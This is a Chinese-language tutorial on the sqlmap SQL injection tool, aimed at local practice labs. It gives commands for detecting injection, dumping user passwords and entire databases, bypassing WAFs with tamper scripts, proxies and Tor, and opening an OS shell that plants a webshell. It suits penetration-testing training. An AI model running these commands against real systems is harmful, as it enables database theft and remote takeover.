SQLMap使用教程：从入门到入狱详细指南

项目地址：GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

SQLMap支持市面上常见的数据库：支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。基本上在进行渗透测试中，我们能见到的数据库都能进行测试。

SQLMap支持多种注入手法：

基于布尔的盲注，即可以根据返回页面判断条件真假的注入；

基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中；

基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断；

联合查询注入，可以使用 union 的情况下的注入；

堆查询注入，可以同时执行多条语句的执行时的注入。

总而言之：SQLMap足以取代我们在渗透测试对SQL注入漏洞的手工测试。通过本篇文章，您将解放双手，灵活的进行SQL注入漏洞测试。话不多说，发车了！！！

SQLMap支持多种功能：数据库指纹识别、数据库枚举、数据提取、访问目标文件系统，并在获取完全的操作权限时执行任意命令。

常用参数介绍

-v  #详细的等级(0-6) 0：只显示Python的回溯，错误和关键消息。 1：显示信息和警告消息。 2：显示调试消息。 3：有效载荷注入。 4：显示HTTP请求。 5：显示HTTP响应头。 6：显示HTTP响应页面的内容 建议使用等级 3 ，可以看到注入语句的Payload，利于入门者学习。-u "http://xxx/Less-1/?id=1" 注入点-f  #指纹判别数据库类型-b  #获取数据库版本信息 -p  #指定可测试的参数(?page=1&id=2 -p "page,id") --level=(1-5) #要执行的测试水平等级，默认为1 level 算是一共注入测试等级，一共是五级，级别越高，检测的内容也就越多，检测级别大于等于 2 时会检测 cookie 是否有注入，检测级别大于等于 3 时会检测 User-Agent 和 Referer 是否有注入。比较推荐使用 5 等级进行测试，确保不会漏掉注入点。--risk=(0-3)  #测试执行的风险等级，默认为1 一共有3个危险等级，也就是说你认为这个网站存在几级的危险等级。和探测等级一个意思，在不确定的情况下，建议设置为3级--time-sec=(2,5) #延迟响应，默认为5 --data #通过POST发送数据 --columns        #列出字段 --current-user   #获取当前用户名称 --current-db     #获取当前数据库名称 --users          #列数据库所有用户 --passwords      #数据库用户所有密码 --privileges     #查看用户权限(--privileges -U root) --dbs            #列出所有数据库 --tables -D ""   #列出指定数据库中的表 --columns -T "user" -D "mysql"      #列出mysql数据库中的user表的所有字段 --dump-all            #列出所有数据库所有表 --dump -T "" -D "" -C ""   #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname) --is-dba      #是否是数据库管理员 --data "" #POST方式提交数据(--data "page=1&id=2") --cookie "用;号分开"      #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) --referer ""     #使用referer欺骗(--referer "http://www.baidu.com") --user-agent ""  #自定义user-agent

基本必会操作

测试GET注入

python sqlmap.py -u "http://127.0.0.1/Less-1/?id=1" -p "id"

测试POST注入

python sqlmap.py -u "http://127.0.0.1/Less-11/" --data="uname=123&passwd=123"

测试Cookie注入

python sqlmap.py -u "https://127.0.0.1" --cookie "customerId=591edabaab5b52292042df8a"

测试SQL注入漏洞是否存在：直接一把梭哈

python sqlmap.py -u "http://127.0.0.1/Less-14/" --level=5 --risk=3

直接指定最高 level，risk 等级，这样可以不漏掉任何一个测试点，但是代价就是比较慢。这个情况适合时间充裕以及最后完全没有办法的梭哈策略。

测试数据包指定字段

使用BurpSuite抓取数据包，对需要测试的位置后面加上 *

POST /Less-11/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Less-11/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1uname=123*&passwd=123*&submit=Submit

执行语句：

python sqlmap.py -r test.txt -v 3

通过这种方式我们就可以实现对我们想要测试的位置进行测试。

获取数据库信息

查看数据库所有用户：
sqlmap -u "http://xxx/Less-1/?id=1" --users查看数据库所有用户名密码：
sqlmap -u "http://xxx/Less-1/?id=1" --passwords查看数据库当前用户：
sqlmap -u "http://xxx/Less-1/?id=1" --current-user 查看当前数据库用户是否具有root权限：
sqlmap -u "http://xxx/Less-1/?id=1" --is-dba查看所有数据库：
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dbs查看指定数据库的所有表：
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --tables查看指定表的所有列：
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --columns查看指定列下的数据：
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users -C username --dump脱裤：
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --dump-all   #爆出数据库security中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dump-all  #爆出该数据库中的所有数据

高端使用指南

WAF绕过

首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现，因为我们在漏扫或者使用专门工具来检测是否有WAF，这个检测，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有，我们可以利用这些来判断。在此我们，也介绍使用sqlmap 进行检测是否否WAF/IPS/IDS

sqlmap -u "" --thread 10 --identify-waf   //首选
sqlmap -u "" --thread 10 --check-waf      //备选

使用任意浏览器进行绕过，尤其是在WAF配置不当的时候

sqlmap -u "" --random-agent -v 2

使用HTTP 参数污染进行绕过

sqlmap -u "" --hpp -v 3

使用长的延时来避免触发WAF的机制，这方式比较耗时

sqlmap -u "" --delay=3.5 --time-sec=60

使用代理进行注入

sqlmap -u "" --proxy=211.211.211.211:8080 --proxy-cred=211:985

匿名注入

sqlmap -u "" --tor

使用脚本绕过

sqlmap 官方提供了53个绕过脚本，脚本目录在/usr/share/sqlmap/tamper中

指定单个脚本：
sqlmap -u "http://xxx/Less-1/?id=1" --tamper=space2plus.py 指定多个脚本：
sqlmap -u "http://xxx/Less-1/?id=1" --tamper="space2comment.py,space2plus.py"

操作系统命令执行

在数据库为MySQL、PostgreSql或者SQL Server时，可以通过sqlmap执行操作系统命令

当为MySQL数据库时，需满足下面条件：

当前用户为 root
知道网站根目录的绝对路径

执行命令

python sqlmap.py -u "127.0.0.1/Less-1/?id=1" --os-shell

之后会要求选择脚本语言：

which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
>

之后会要求我们选择路径

what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>【1】使用公共的默认目录(C:/xampp/htdocs/，C:/wamp/www，C:/Inetpub/wwwroot/)
【2】自定义网络根目录绝对路径
【3】指定自定义的路径文件
【4】暴力破解

执行os-shell的过程中，sqlmap会向网站根目录写入两个文件 tmpblwkd.php 和 tmpueqch.php。真正的木马文件是tmpblwkd.php 。如果是非正常退出sqlmap的话，这两个文件不会被删除。只有当我们输入 x 或 q 退出 sqlmap 时，该文件才会被自动删除。

测试：执行命令dir

文章参考：向两个大佬致谢，在阅读时受益良多！

https://www.freebuf.com/sectool/164608.html
https://www.cnblogs.com/bmjoker/p/9326258.html

最后，创作不易，求各位路过大佬点个赞支持一下。

愿每一个深夜孤独起舞的自己，终将闪闪发光！！！